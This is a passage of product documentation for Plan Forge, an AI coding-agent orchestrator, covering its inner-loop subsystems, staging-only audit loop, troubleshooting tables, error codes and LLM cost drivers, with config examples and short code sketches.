| Cost-anomaly (C3) | Every slice | .forge/cost-anomalies.jsonl, Dashboard | Advisory (detection only) |
The individual subsystems are useful on their own. The mesh is what turns a slice runner into a self-deterministic loop: a trajectory written today becomes part of tomorrow's planning context; a cost anomaly noticed this run becomes the reason next run's hardener picks a cheaper model for that slice; a gate command accepted three times graduates into the validation template for that domain. None of this changes the deterministic execution contract; it only changes the information the deterministic executor runs with.
Seven subsystems (reflexion, trajectories, auto-skills, gate synthesis, postmortems, federation, and the opt-in reviewer) that turn every slice into a research step.
For the canonical system-wide overview covering Phase-25 and Phase-26 together, see The Self-Deterministic Agent Loop.
The deterministic slice executor (Phase-1 through Phase-24) is the spine. The Phase-25 subsystems bolt on reflective behavior at specific transitions; they never replace the spine, they only enrich it.
Each subsystem has a single job, a single config key (if any), and a single storage artifact. Add them up and you get a closed research loop where every run teaches the next.
When a slice's validation gate fails, the orchestrator builds a compact Markdown block with the gate command, model, duration, and the stderr tail (≤2KB). That block is injected into the next attempt's prompt so the worker reasons about its prior failure instead of blindly trying the same thing.
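A minimal sketch of the idea, assuming a simple Markdown layout and hypothetical field names: it caps the stderr tail at 2KB and assembles a block that could be prepended to the next attempt's prompt. It is not the `buildReflexionBlock()` implementation, whose exact output format is not documented here.

```javascript
// Hypothetical sketch: field names and Markdown layout are assumptions.
const MAX_STDERR_BYTES = 2048; // the 2KB cap described above

// Keep only the last maxBytes bytes of the text (the "tail").
// Note: cutting on a byte boundary can split a multi-byte character.
function tailBytes(text, maxBytes) {
  const buf = Buffer.from(text, "utf8");
  if (buf.length <= maxBytes) return text;
  return buf.subarray(buf.length - maxBytes).toString("utf8");
}

function buildReflexionSketch({ gateCommand, model, durationMs, stderr }) {
  return [
    "### Previous attempt failed",
    `- Gate: ${gateCommand}`,
    `- Model: ${model}`,
    `- Duration: ${durationMs} ms`,
    "",
    "Stderr tail:",
    tailBytes(stderr, MAX_STDERR_BYTES),
  ].join("\n");
}
```

Capping the tail keeps the injected context small and bounded, so a noisy gate cannot crowd out the rest of the prompt.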
pforge-mcp/memory.mjs → buildReflexionBlock()
On slice pass, Plan Forge extracts the sentinel-wrapped note the worker produced (<!-- PFORGE_TRAJECTORY:BEGIN -->…<!-- PFORGE_TRAJECTORY:END -->), word-caps it at 500, and writes it to disk. Postmortems and federation consumers read these for compact run narratives.
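The extraction step can be sketched as follows. The sentinel strings come from the text above; the function name is hypothetical, and collapsing whitespace while applying the word cap is a simplification chosen for this example rather than documented behavior.

```javascript
const BEGIN = "<!-- PFORGE_TRAJECTORY:BEGIN -->";
const END = "<!-- PFORGE_TRAJECTORY:END -->";

// Return the note between the sentinels, capped at maxWords, or null if absent.
// Simplification: runs of whitespace are collapsed to single spaces.
function extractTrajectory(workerOutput, maxWords = 500) {
  const start = workerOutput.indexOf(BEGIN);
  if (start === -1) return null;
  const end = workerOutput.indexOf(END, start + BEGIN.length);
  if (end === -1) return null;
  const note = workerOutput.slice(start + BEGIN.length, end).trim();
  const words = note.split(/\s+/).filter(Boolean);
  return words.slice(0, maxWords).join(" ");
}
```

Returning null for a missing or unterminated sentinel lets the caller skip the write instead of storing a partial note.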
pforge-mcp/memory.mjs → writeTrajectory()
.forge/trajectories/<slice>/<iso>.md
A slice that passes gets captured as a candidate auto-skill with its domain keywords, gate commands, and a SHA prefix. Before the next slice, the orchestrator retrieves matching skills (ranked by reuse count) and injects them into the prompt. A skill promotes to "stable" once its reuse count hits the threshold (default 3).
pforge-mcp/memory.mjs → retrieveAutoSkills() / writeAutoSkill()
.forge/auto-skills/*.md
During plan pre-flight the orchestrator scans every slice. If a slice's title or file list matches a Tempering domain profile (domain / integration / controller) but declares no validation gate, it prints a suggested command using the project's Tempering coverage minimum and runtime budget. Default mode is suggest; set mode: "off" to silence it.
pforge-mcp/orchestrator.mjs → synthesizeGateSuggestions()
runtime.gateSynthesis: { mode, domains }
After every run, pass or fail, Plan Forge writes a JSON postmortem with retriesPerSlice, gateFlaps, topFailureReason, costDelta, and driftDelta (deltas vs the prior run). Retention is 10 per plan. The Step-2 hardener now reads the newest 3 postmortems and folds their signals into the Scope Contract, closing the loop from execution back into planning.
pforge-mcp/orchestrator.mjs → buildPlanPostmortem() / writePlanPostmortem()
maxRunHistory-style defaults
.forge/plans/<plan-basename>/postmortem-*.json
Opt-in. When a cross.* brain recall misses L3 (OpenBrain), the facade fans out to the repos listed in brain.federation.repos[] and reads their .forge/brain/<entity>/<id>.json, read-only, absolute local paths only. URLs and relative paths are rejected by contract.
pforge-mcp/brain.mjs → federationRead()
brain.federation: { enabled, repos: [] }, defaults off
.. rejected; defense-in-depth path containment check
Opt-in. When enabled, the brain.gate-check responder invokes a speed-quorum reviewer on each slice's diff summary and attaches a verdict to the response (score, critical, summary, durationMs). Advisory-only by default: critical verdicts do not block the next slice unless operators explicitly set blockOnCritical: true. Blocking mode enters Phase-26 after calibration data exists.
pforge-mcp/brain.mjs → invokeReviewer()
runtime.reviewer: { enabled, quorumPreset, blockOnCritical, timeoutMs }
enabled=false, quorumPreset="speed" (D5), blockOnCritical=false (D6), timeoutMs=30000
Everything the Inner Loop exposes lives under two keys in .forge.json, and every key has a toggle in the Dashboard → Config tab.
{
"runtime": {
"gateSynthesis": { "mode": "suggest", "domains": ["domain", "integration", "controller"] },
"reviewer": { "enabled": false, "quorumPreset": "speed", "blockOnCritical": false, "timeoutMs": 30000 }
},
"brain": {
"federation": { "enabled": false, "repos": [] }
}
}
Three more subsystems close the loop further: the slice executor can now race strategies, draft its own patches when a gate fails, and flag token-cost drift without halting a run.
innerLoop.competitive. See The Competitive Loop for the full flow.
.patch file under .forge/proposed-fixes/. Advisory, nothing auto-applies unless applyWithoutReview: true.
ratio (default 2.0) are recorded in .forge/cost-anomalies.jsonl. Detection only; never halts a run.
Additional config block (added by the v2.58 best-defaults preset for new installs; existing projects opt in):
{
"innerLoop": {
"competitive": { "enabled": false, "maxParallel": 2, "timeoutSec": 1800 },
"autoFix": { "enabled": true, "applyWithoutReview": false },
"costAnomaly": { "enabled": true, "ratio": 2.0, "medianWindow": 20 }
}
}
All three are surfaced in the Dashboard's new Inner Loop tab alongside the Phase-25 subsystems.
Opt-in worktree races, winner election, auto-fix proposals, and cost-anomaly detection — three opt-in inner-loop subsystems.
.forge/proposed-fixes/ for you to review. It never applies the fix automatically.
For the canonical system-wide overview covering Phase-25 and Phase-26 together, see The Self-Deterministic Agent Loop.
When a slice is marked for competitive execution, the orchestrator spawns a worktree per strategy, runs each in isolation, and elects a single winner. Losing worktrees are cleaned up; only the winner's changes enter the working tree.
Election is deterministic. The orchestrator walks the rules in order and stops at the first one that produces a unique winner.
innerLoop.reviewer.enabled is true, the highest reviewer score among remaining strategies wins.
When a slice's validation gate fails and the trajectory suggests a small local correction (single file, under a few hundred lines of diff), the orchestrator drafts a patch file instead of retrying blindly.
.forge/proposed-fixes/<fixId>.patch with metadata in .forge/fix-proposals.json.
applyFixProposal; the patch is git-apply-style so rollbackFixProposal can undo it cleanly.
innerLoop.autoFix.applyWithoutReview: true. This is off by default for a reason: review the patch first.
Every slice's total token cost is compared against the rolling per-model median (default window: 20 runs). Ratios above innerLoop.costAnomaly.ratio (default 2.0) are logged to .forge/cost-anomalies.jsonl and surfaced in the Dashboard's Inner Loop tab.
Detection is advisory: anomalies never halt a run. The signal is there so you can investigate why a slice drifted (stale prompts, model degradation, a gate that's suddenly looping) before it shows up as a surprise on the month's bill.
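The comparison against a rolling median can be sketched like this. The defaults (`ratio` 2.0, `medianWindow` 20) come from the text; the function names, the shape of `history`, and the returned object are assumptions for illustration.

```javascript
function median(values) {
  const sorted = [...values].sort((a, b) => a - b);
  const mid = Math.floor(sorted.length / 2);
  return sorted.length % 2 ? sorted[mid] : (sorted[mid - 1] + sorted[mid]) / 2;
}

// history: prior slice costs for the same model, oldest first (assumed shape).
// Returns an anomaly record, or null when the slice is within the expected range.
function detectCostAnomaly(cost, history, { ratio = 2.0, medianWindow = 20 } = {}) {
  const recent = history.slice(-medianWindow);
  if (recent.length === 0) return null; // nothing to compare against yet
  const baseline = median(recent);
  if (baseline <= 0) return null;
  const observed = cost / baseline;
  return observed > ratio ? { cost, baseline, ratio: observed } : null;
}
```

A median baseline is less sensitive to a single expensive outlier than a mean would be, which suits a detector that is meant to flag outliers rather than absorb them.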
All three subsystems live under a single innerLoop key in .forge.json. New installs receive these defaults via the v2.58 best-defaults preset; existing projects opt in per-subsystem.
{
"innerLoop": {
"competitive": { "enabled": false, "maxParallel": 2, "timeoutSec": 1800 },
"autoFix": { "enabled": true, "applyWithoutReview": false },
"costAnomaly": { "enabled": true, "ratio": 2.0, "medianWindow": 20 }
}
}
Closed-loop bug discovery: content-audit scan → triage → fix, iterating until convergence or max rounds.
The audit loop defaults to off. It never runs automatically unless you explicitly set audit.mode to "auto" or "always" in .forge.json. Production environments are always forbidden.
The audit loop is a first-class Tempering subsystem that discovers bugs from a running system. It probes live routes against a dev or staging server, triages the findings into actionable lanes, and iterates until the finding count converges (no new issues found) or the maximum round limit is reached.
pforge-mcp/tempering/scanners/content-audit.mjs: HTTP-probes a set of routes against a live base URL and emits structured findings: HTTP status, page title, h1, word count, placeholder markers, and client-shell detection for hydrated SPAs.
looksLikeProduction() from ui-playwright.mjs. Refuses to crawl production URLs unless allowProduction: true is explicitly set (and forbidProduction in config is immutably true).
pforge-mcp/tempering/triage.mjs: routeFinding(finding, classifier) routes each finding to one of three lanes:
| Lane | Destination | What happens |
|---|---|---|
| "bug" | Bug Registry | Finding registered via forge_bug_register |
| "spec" | Crucible | Finding submitted as a new smelt (feature gap) |
| "classifier" | Local artifact | Proposal written to .forge/audits/ for human review |
Unknown classifier output falls safe to { lane: "bug", confidence: "low" }, so findings are never dropped.
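The fail-safe behavior is worth seeing in code. The sketch below follows the documented `routeFinding(finding, classifier)` signature and the `{ lane, payload, confidence }` return shape, but the body is an assumption: in particular, treating a classifier that throws the same way as unknown output is this example's choice, not documented behavior.

```javascript
const LANES = new Set(["bug", "spec", "classifier"]);

// classifier is injected and may return anything, including garbage.
function routeFindingSketch(finding, classifier) {
  let verdict = null;
  try {
    verdict = classifier(finding);
  } catch {
    verdict = null; // assumption: a crashing classifier counts as unknown output
  }
  if (!verdict || !LANES.has(verdict.lane)) {
    // Fall safe: never drop a finding, route it to the bug lane with low confidence.
    return { lane: "bug", payload: finding, confidence: "low" };
  }
  return { lane: verdict.lane, payload: finding, confidence: verdict.confidence ?? "low" };
}
```

Because the classifier is a parameter, the fallback path can be exercised in tests with a stub that returns nonsense.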
pforge-mcp/tempering/drain.mjs: runTemperingDrain(opts) orchestrates the full cycle:
routeFinding()
spawnWorker)
maxRounds (default 5)
Configuration lives in .forge.json#audit:
{
"audit": {
"mode": "off",
"maxRounds": 5,
"autoThresholds": {
"minFilesChanged": 5,
"minDaysSinceLastDrain": 3,
"requireFindings": true
},
"environments": ["dev", "staging"],
"forbidProduction": true
}
}
| Mode | Behavior |
|---|---|
| "off" (default) | No automatic drain. Manual only via pforge audit-loop. |
| "auto" | Evaluates thresholds after plan completion. Fires only if change-surface signals trip. |
| "always" | Dispatches unconditionally after every plan completion. |
# Manual one-shot (ignores config, always runs)
pforge audit-loop
# Respect .forge.json#audit config
pforge audit-loop --auto
# Dry run with custom rounds
pforge audit-loop --dry-run --max=3
# Target staging
pforge audit-loop --env=staging
forge_tempering_drain: programmatic drain loop access. Accepts project, maxRounds, scanners, dryRun, env.
forge_triage_route: route a single finding through the classifier. Returns { lane, payload, confidence }.
The audit-loop toggle in the dashboard persists to .forge.json#audit; it is not session-scoped. This matches the pattern used by Forge-Master prefs (.forge/fm-prefs.json) and the quorum advisory toggle.
The discovery harness is the engine that turns a running dev server into a stream of structured findings. It uses a 4-pass build sequence (crawl, wrap, execute, auto-smelt) to close the loop between bug discovery and bug resolution with no human triage required.
A headless Playwright browser crawls every route exposed by the dev server. For each page the harness records HTTP status, document title, h1 text, word count, placeholder markers (e.g. Coming soon, TODO), broken links, and client-shell detection for hydrated SPAs. Results are written as structured JSON to .forge/audits/.
Representative example: a marketing site with 47 routes produces 12 findings on its first pass: three placeholder headings, two broken anchor links, four pages returning non-200 status codes, and three pages with zero meaningful content.
Each finding from Pass 1 is transformed into a Crucible smelt via forge_crucible_submit. The wrapper applies severity triage, routing findings through the three-lane classifier (bug, spec, classifier) before packaging them as structured smelt input with enough context for the hardener to produce actionable plan slices.
The hardened plan runs slice-by-slice through forge_run_plan. Each slice carries its own validation gate and Tempering re-audit. LiveGuard hooks fire between slices, catching regressions before they compound.
Any Tempering failures from Pass 3 are converted into new smelts via forge_tempering_drain and re-entered into the bug registry, with no human triage required. The loop iterates until convergence (zero new findings) or the configured maxRounds limit (default 5) is reached.
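The stopping rule (zero new findings, or maxRounds reached) can be sketched with injected `scan` and `fix` callbacks. Both callbacks, the finding-id representation, and the synchronous style are assumptions made to keep the example short; `runTemperingDrain` itself is not reproduced here.

```javascript
// scan(): returns an array of finding ids for the current state (injected, assumed).
// fix(findings): attempts remediation of the new findings (injected, assumed).
function runDrainSketch({ scan, fix, maxRounds = 5 }) {
  const seen = new Set();
  for (let round = 1; round <= maxRounds; round++) {
    const fresh = scan().filter((id) => !seen.has(id));
    if (fresh.length === 0) return { converged: true, rounds: round };
    fresh.forEach((id) => seen.add(id));
    fix(fresh);
  }
  return { converged: false, rounds: maxRounds };
}
```

Tracking ids that were already seen is what makes "no new findings" a meaningful convergence test: a finding that keeps reappearing does not keep the loop alive on its own.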
Every finding from the discovery harness gets sorted into one of three lanes by the wrapper before reaching Crucible. Lane assignment determines whether a human ever sees the finding, what shape the resulting plan slice takes, and how the loop closes. The funnel is the difference between an audit that produces 100 PRs nobody reads and an audit that produces 5 PRs that ship.
Findings with high confidence and a clear remediation pattern (broken links, non-200 status codes, placeholder markers, hydration failures) drop into the bug lane. The wrapper packages them as Crucible smelts with severity attached, then the auto-smelt pass converts them into entries in the bug registry. No human triage is required; the loop closes automatically.
Representative example: a 4-pass run finds 8 broken anchor links across the docs. All 8 land in the bug lane as a single batch smelt with severity medium, generate one plan slice that fixes them together, and close themselves out via tempering re-audit.
Findings that imply missing or ambiguous spec content (placeholder headings like "Coming soon," pages with zero meaningful content, hydrated SPAs that crash without JS) drop into the spec lane. These can't be auto-fixed because the harness doesn't know what content should be there, only that something is missing. The wrapper escalates them as Crucible smelts requiring human input before they can be hardened into plan slices.
Representative example: the harness finds a route titled "Pricing, Coming soon" with 12 words of body content. Spec lane escalates this to a human as a Crucible smelt requesting a draft of the actual pricing tier copy. The human responds in the Crucible interview funnel, the wrapper hardens the response into a plan slice, and the loop resumes.
Findings the classifier can't confidently sort (novel signals, contradictory evidence, low confidence scores) drop into the classifier lane. Rather than guess, the wrapper records the finding plus the classifier's confusion signal as a Crucible smelt targeting the classifier itself. Over time, classifier-lane volume should drop as the classifier learns from each handoff.
Representative example: the harness finds a 200 OK route with full content, but the document title is just "."; the classifier hasn't seen this signal before. Classifier lane creates a smelt asking the maintainer "should pages with single-character titles be flagged as defective?" The answer becomes a new classifier rule for the next run.
| Finding type | Default lane | Why |
|---|---|---|
| Non-200 HTTP status | Bug | Unambiguous failure, fix is mechanical |
| Broken anchor / link | Bug | Target either exists or it doesn't; trivial to verify |
| Placeholder marker (TODO, Coming soon) | Spec | Implies missing content, not broken content |
| Zero meaningful content | Spec | Page exists but says nothing, needs human authoring |
| Hydration failure (SPA crashes without JS) | Bug | Build / config defect, not a content gap |
| Novel signal / low confidence | Classifier | Classifier can't sort; ask the maintainer |
| Mixed signals (multiple conflicting findings) | Classifier | Pre-empt a wrong auto-smelt by asking first |
For a worked example of how the bug lane closes a real defect end-to-end, including the multi-model quality patterns that catch issues a single model misses, see Quorum Quality Examples in Chapter 14.
.forge/audits/ as JSON artifacts. GitHub PR creation is a deferred enhancement.
spawnWorker is injectable: Consistent with visual-diff quorum and bug classifier patterns. Already in the function signature.
forbidProduction: true cannot be overridden via config; it's hardcoded in auto-activate.mjs.
"Something's wrong." Find the answer fast.
Every tool breaks eventually. The question is whether you have a diagnostic path or just a prayer. Start with pforge smith; it catches 80% of issues in 5 seconds.
| Tool | What It Checks | When to Use |
|---|---|---|
| pforge smith | Environment, VS Code config, setup health, version | First thing when anything seems off |
| pforge check | Setup file existence and validity | After setup or update |
| forge_diagnose({ file }) (MCP tool) | Multi-model bug investigation on a specific file | When a slice fails and you can't see why, invoke from Copilot Chat |
pforge smith looks like
If you've never run it, here's the shape of the output to compare against. Anything red or marked FAIL is a real problem; WARN usually means an optional extension or integration isn't installed.
$ pforge smith
Plan Forge v3.12.0, forge diagnostic
Environment
OS Windows 10.0.22631 OK
Shell PowerShell 7.4.1 OK
Node v20.11.0 OK (≥ 20 required)
Git 2.42.0 OK (≥ 2.30 required)
Forge layout
.github/prompts 22 files OK
.github/instructions 22 files OK
.github/agents 14 files OK
.github/hooks 7 files OK
.github/skills 12 files OK
docs/plans 5 files OK
.forge/config.json present OK
MCP server
pforge-mcp/server.mjs present OK
Port 3100 free OK
Port 3101 (WS hub) free OK
Agent adapters
copilot .vscode/mcp.json OK
claude .mcp.json not installed WARN (run setup with --agent claude)
cursor .cursor/mcp.json not installed WARN
codex .codex/mcp.json not installed WARN
Result: 15 OK, 3 WARN, 0 FAIL , forge is healthy
The Result: line is the headline. If FAIL = 0 you're fine to keep working. WARNs are reminders, not blockers.
| Symptom | Cause | Fix |
|---|---|---|
| AI ignores coding standards | Instruction files not loading | Check applyTo pattern matches the file you're editing. Run pforge smith to verify file counts. |
| Wrong instructions loading | applyTo glob too broad | Narrow the pattern: use **/auth/** instead of ** |
| Guardrails load but AI ignores them | Context budget exceeded | Reduce copilot-instructions.md to <80 lines. Remove applyTo: '**' from non-essential files. |
| Project Principles not enforced | PROJECT-PRINCIPLES.md missing | Run the project-principles prompt. The instruction file activates only when this file exists. |
| Symptom | Cause | Fix |
|---|---|---|
| Gate fails with build errors | Code doesn't compile | Fix the build error, then pforge run-plan --resume-from N |
| Gate fails, tests regress | New code broke existing tests | Fix the regression. Check if scope contract is too broad. |
| Slice times out | Context window exhausted or model overloaded | Split the slice into smaller chunks. Try a different --model. |
| Model returns error | API key invalid or rate limited | Check XAI_API_KEY / OPENAI_API_KEY env vars. Wait for rate limit reset. |
| Scope violation detected | AI touched forbidden files | The PreToolUse hook should catch this. If not, tighten the Scope Contract. |
| Escalation exhausted | All models in chain failed | Review the slice; it may be too complex. Break into sub-slices or simplify gates. |
| Symptom | Cause | Fix |
|---|---|---|
| Connection refused on :3100 | Server not running | node pforge-mcp/server.mjs |
| Port already in use | Another process on 3100 | node pforge-mcp/server.mjs --port 4100 or kill the conflicting process |
| Blank page loads | Missing node_modules | cd pforge-mcp && npm install |
| WebSocket disconnects | Firewall or proxy blocking :3101 | Allow port 3101, or set WS_PORT env var |
| No data in Runs/Cost tabs | No execution history yet | Run a plan first: pforge run-plan |
| Symptom | Cause | Fix |
|---|---|---|
| "Preset not found" | Typo in preset name | Valid presets: dotnet, typescript, python, java, go, swift, rust, php, azure-iac |
| Permission denied | Read-only directory or no git access | Check file permissions. Run from a writable directory. |
| Existing files conflict | Previous setup exists | Use -Force flag to overwrite, or pforge update for selective updates |
| Wrong files installed | Incorrect preset for your stack | Re-run: .\setup.ps1 -Preset <correct-preset> -Force |
| Strategy | Savings | How |
|---|---|---|
| Use cheaper execution model | 50–70% | Set modelRouting.execute to a smaller model |
| Reserve expensive model for review | 30–50% | modelRouting.review: "claude-opus-4.6" |
| Raise quorum threshold | 20–40% | --quorum-threshold 8 (fewer slices trigger consensus, see scoring rubric) |
| Reduce context per slice | 10–20% | Use targeted Context: lists (see Chapter 4) |
| Preview before running | N/A | pforge run-plan --estimate or forge_estimate_quorum (compares all four modes) |
xAI Grok Aurora returns JPEG bytes regardless of requested format. If raw bytes with wrong MIME type enter the conversation history, the session becomes unrecoverable.
The generateImage() function detects the actual format via magic bytes and converts using sharp. Sessions should be safe, but if you encounter the MIME mismatch error, start a fresh session.
Safe workflow: Use .jpg extensions (matches Grok's native output), generate art in dedicated sessions, or use the REST API: POST /api/image/generate.
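For readers unfamiliar with magic-byte detection, here is a minimal sketch of the technique: it inspects the leading bytes of the payload and ignores whatever MIME type was claimed. The function name is hypothetical and this is not the `generateImage()` code; the JPEG and PNG signatures themselves are standard.

```javascript
// Detect the real image format from the leading bytes, ignoring the claimed MIME type.
// Accepts a Buffer, Uint8Array, or plain array of byte values.
function sniffImageMime(bytes) {
  const startsWith = (sig) => sig.every((b, i) => bytes[i] === b);
  if (startsWith([0xff, 0xd8, 0xff])) return "image/jpeg";
  if (startsWith([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a])) return "image/png";
  return null; // unknown format: let the caller decide how to handle it
}

// A payload that claims to be PNG but starts with the JPEG signature.
const claimedMime = "image/png";
const actualMime = sniffImageMime(Uint8Array.from([0xff, 0xd8, 0xff, 0xe0, 0x00]));
const needsConversion = actualMime !== null && actualMime !== claimedMime;
```

When `needsConversion` is true, the bytes should be converted or relabeled before they are stored anywhere that trusts the declared type.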
| Error | Cause | Fix |
|---|---|---|
| No .forge.json found | Not in a Plan Forge project | Run pforge init or setup.ps1 |
| templateVersion mismatch | Framework files outdated | pforge update |
| No API key configured | Missing env var for image/analysis | Set XAI_API_KEY or OPENAI_API_KEY |
| Plan parsing failed | Malformed plan file | Check for missing ## Execution Slices section or broken markdown |
| Gate command failed (exit 1) | Build or test failure | Fix the code, then --resume-from N |
| DRIFT DETECTED | Forbidden file modified | Revert the forbidden change, re-run the slice |
| CRITICAL_FIELDS_MISSING v2.82.1 | Crucible finalize blocked, missing build-command, test-command, scope, gates, forbidden-actions, or rollback | Call forge_crucible_preview for criticalGaps[], then continue the interview |
| PLAN_ALREADY_EXISTS v2.82.1 | Crucible finalize refuses to overwrite hand-authored docs/plans/Phase-NN.md | Read both files (existing plan + .crucible-draft.md), then re-finalize with overwrite: true if you really mean it |
| ASK_QUESTION_MISMATCH v2.82.1 | Client passed a stale questionId to forge_crucible_ask | Re-fetch state via forge_crucible_preview, retry with the current question id |
| QUORUM_ALL_FAILED v2.78 | All quorum models timed out (60s each) or errored | Check API keys / network; retry. Consider --quorum=speed if flagship models are unavailable. Multi-agent quorum reference. |
| NO_REASONING_MODEL | Forge-Master has no model configured and no API key found | gh auth login for zero-key path, or set ANTHROPIC_API_KEY / OPENAI_API_KEY / XAI_API_KEY, or set forgeMaster.reasoningModel |
| Subprocess STATUS_CONTROL_C_EXIT (0xC000013A) v2.81 | Worker process was killed by signal mid-slice | Slice is now correctly marked failed (not silently passed). Check statusReason, then --resume-from N |
| slice-orphan-warning event v2.82.1 | Failed slice's worker deliverables were staged but not committed | See .forge/runs/<runId>/orphans-slice-<N>.json for copy-paste recovery commands |
The Crucible critical-fields gate refuses to draft TBD-laden plans. If finalize keeps returning CRITICAL_FIELDS_MISSING, the recovery path is:
forge_crucible_preview { id }, returns criticalGaps: [{ field, reason, hint }, …]
forge_crucible_ask queues a question that targets that field
inferRepoCommands, usually you just confirm
If the gate is blocking on something you genuinely don't need (rare, because the gate exists for good reason), the escape hatch is --manual-import on a hand-authored plan. See Chapter 5: Enforcement Gate.
Forge-Master classifies prompts into operational, troubleshoot, build, advisory, or offtopic. Misroutes happen most often when:
via field in the response. If "keyword", try a more keyword-rich phrasing ("status of …", "why did … fail", "should we …")
GET /api/forge-master/cache-stats
grok-3-mini is fine for most prompts but quirky vocabulary may need grok-4 or gpt-4o-mini. Override via forgeMaster.routerModel in .forge.json
"auto", requires lane=advisory + autoEscalated=true + fromTier=high + confidence≥medium. Use "always" to remove gating during testing
See Forge-Master chapter: Troubleshooting for the full list.
Host-aware routing detects which IDE / CLI host you're running Plan Forge from (VS Code + Copilot, Claude Code, Cursor, Windsurf, Zed, bare terminal) so you don't silently double-pay against your non-Copilot subscription when calling gpt-* models. If you're seeing surprising routing behavior:
| Symptom | What's happening | Override |
|---|---|---|
| "My gpt-* calls cost more on Claude Code than VS Code" | Default auto mode prefers direct OpenAI API on non-Copilot hosts (honors your subscription) | Set routing.hostPreference: "gh-copilot" in .forge.json to force Copilot subscription billing |
| "Quorum dropped gpt-* from the run" | You're on a non-Copilot host AND OPENAI_API_KEY is unset AND routing.hostPreference is "drop" | Set the API key, or change preference to "auto" / "gh-copilot" |
| "Quorum pre-run summary table shows different billing per model" | Working as intended: the table shows host + per-model billing surface so you can see spend distribution before dispatch | None; this is a feature, not a bug |
If a script needs to react to a Plan Forge failure programmatically, branch on the exit code (CLI / orchestrator) or the named error code (MCP tools / REST). These are stable across releases; new failure modes get new codes rather than reusing existing ones.
| Layer | Returns | Branch on |
|---|---|---|
| pforge CLI | POSIX exit code | 0 success · 1 generic failure · 2 environment refusal (not in git repo, update-check failed, audit had no scanners) |
| pforge run-plan | Exit code + statusReason in JSON | 0=completed / completed-with-warnings · 1=failed / aborted. statusReason narrows it: gate-failed, drift-detected, quorum-all-failed, etc. |
| MCP tools (forge_*) | { ok, code, error } envelope | ok: false with a named code, e.g. NO_API_KEY, CRITICAL_FIELDS_MISSING, QUORUM_ALL_FAILED, PLAN_NOT_FOUND |
| REST (POST /api/…) | HTTP status + JSON body | 400 bad body · 404 missing · 409 state conflict (ERR_UPDATE_DURING_RUN) · 429 rate limited (use retryAfterMs) · 500 internal |
| OS subprocess (worker, gate) | Native exit code, surfaced via statusReason | 0xC000013A Windows Ctrl+C · 130/137/143 POSIX signals. Mapped to worker-signaled. |
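A script that branches on these codes might look like the sketch below. Both helper names are hypothetical, and folding CLI exit codes and raw subprocess codes into one function is a simplification for illustration; the codes themselves come from the table above.

```javascript
// Map an exit code to a coarse category, using the codes listed in the table above.
// Simplification: CLI codes (0/1/2) and raw subprocess codes share one function here.
function classifyExit(code) {
  if (code === 0) return "success";
  if (code === 0xc000013a) return "worker-signaled"; // Windows Ctrl+C
  if (code === 130 || code === 137 || code === 143) return "worker-signaled"; // POSIX signals
  if (code === 2) return "environment-refusal";
  return "failed";
}

// Branch on the { ok, code, error } envelope returned by MCP tools.
// Treating QUORUM_ALL_FAILED as retryable follows the "retry" advice in the error table.
function shouldRetry(envelope) {
  if (envelope.ok) return false;
  return envelope.code === "QUORUM_ALL_FAILED";
}
```

Branching on the named code rather than on the human-readable `error` string keeps a script stable if message wording changes.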
📄 Full reference: FAQ, Multi-Agent Setup — GitHub Copilot
How Plan Forge prices LLM calls, where token costs come from, the three sources of truth, per-quorum-mode economics, cost-effective workflow patterns, and the anti-lock-in commitments that keep your provider bill yours: never marked up, never proxied, never withheld.
forge_estimate_quorum for projections and forge_cost_report for actuals. If you're building a UI with a quorum picker, populate it from forge_estimate_quorum; do not invent dollar amounts.
Plan Forge has no Plan Forge bill. It has your provider bill, plus the orchestrator's bookkeeping to tell you what fraction of that bill belongs to which slice, which plan, and which model. Three things follow from that:
forge_cost_report are the numbers on your provider invoice.
Cost numbers in Plan Forge come from exactly three places. Knowing which is which prevents the common confusion between "what a slice will cost" and "what it did cost."
| Source | Answers | How to read it |
|---|---|---|
| MODEL_PRICING table (pforge-mcp/cost-service.mjs) | "What does a given model charge per million input / output / cache tokens?" | Static table, updated when providers publish new prices. Each entry cites its _source URL with date. Cache, flex, priority, and AOAI deployment multipliers are encoded alongside the base rates. |
| forge_estimate_quorum · forge_estimate_slice | "What will this plan / slice cost before I run it?" | Token-aware projections. Walks each slice, projects worker tokens by file size + scope, projects quorum panel by mode. Returns four-mode breakdown (auto / power / speed / disabled) for plans. |
| forge_cost_report | "What did Plan Forge actually charge to my providers?" | Aggregates .forge/cost-history.json, one record per LLM call with run id, slice, role, model, tokens, ticks (xAI exact-cost), and dollar amount. Roll up by day / month / model / role. |
The variables that move your bill, ranked roughly by how much leverage they have.
| Driver | Range | How to manage it |
|---|---|---|
| Model tier | ~60–100× spread between flagship and nano (claude-opus-4.7 $5/$25 vs gpt-5-nano $0.05/$0.40 per 1M tokens: 100× on input, ~63× on output) | Use cheaper models for code-search / classification / routing. Reserve flagships for hard reasoning slices. The auto quorum mode does this automatically. |
| Token volume per slice | 1K (small CRUD) to 200K (large refactor with broad context) | Tighten scope contracts. A slice that touches 4 files costs ~10× less than one that touches 40, even with the same logic. Split fat slices. |
| Quorum panel size | 1 model (disabled) to 5+ models (power mode) | Use auto by default; opt into power only for high-stakes or low-confidence decisions. See per-quorum-mode economics. |
| Cache reuse | 1.0× (no cache) down to 0.10× (Anthropic / OpenAI cache read) | Plan Forge sends the same system blocks across slices in a run, which providers cache. No action needed; just don't restart the run between slices unnecessarily. |
| Reasoning tokens (o-series, GPT-5 reasoning) | Often 5–20× visible output | Reasoning tokens are billed at the output rate and already counted in output_tokens, so don't double-count when estimating. Use reasoning models only when the slice needs them. |
| Retries & escalation | 1× (clean pass) to 3–5× (full escalation chain) | Tighten validation gates so first-pass success rate climbs. The Inner Loop's reviewer calibration is designed for this, see Chapter 14 deep dive — The Inner Loop. |
| AOAI deployment type | 1.0× (global / provisioned) to 1.1× (data-zone / regional) | Use global Azure OpenAI deployments unless data-residency requires otherwise. The 10% uplift is encoded in aoai_deployment_type_multiplier. |
| Priority / flex tier (GPT-5.x) | 0.5× (flex) to 2.0× input / 1.5× output (priority) | Flex is fine for batch / offline runs; priority is rarely worth it for plan execution. Default tier is standard. |
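To make the interaction between model tier, token volume, and cache reuse concrete, here is a minimal sketch of per-call cost arithmetic. It uses the per-million rates quoted in the table for claude-opus-4.7 and gpt-5-nano; the function name `estimateCallUsd` and the field names (`inputPerM`, `outputPerM`, `cacheReadMultiplier`, `cachedInput`) are hypothetical and are not the actual MODEL_PRICING schema.

```javascript
// Sketch only: dollar cost of one LLM call from per-million-token rates.
// Field names are hypothetical, not the real MODEL_PRICING layout.
function estimateCallUsd(tokens, rates) {
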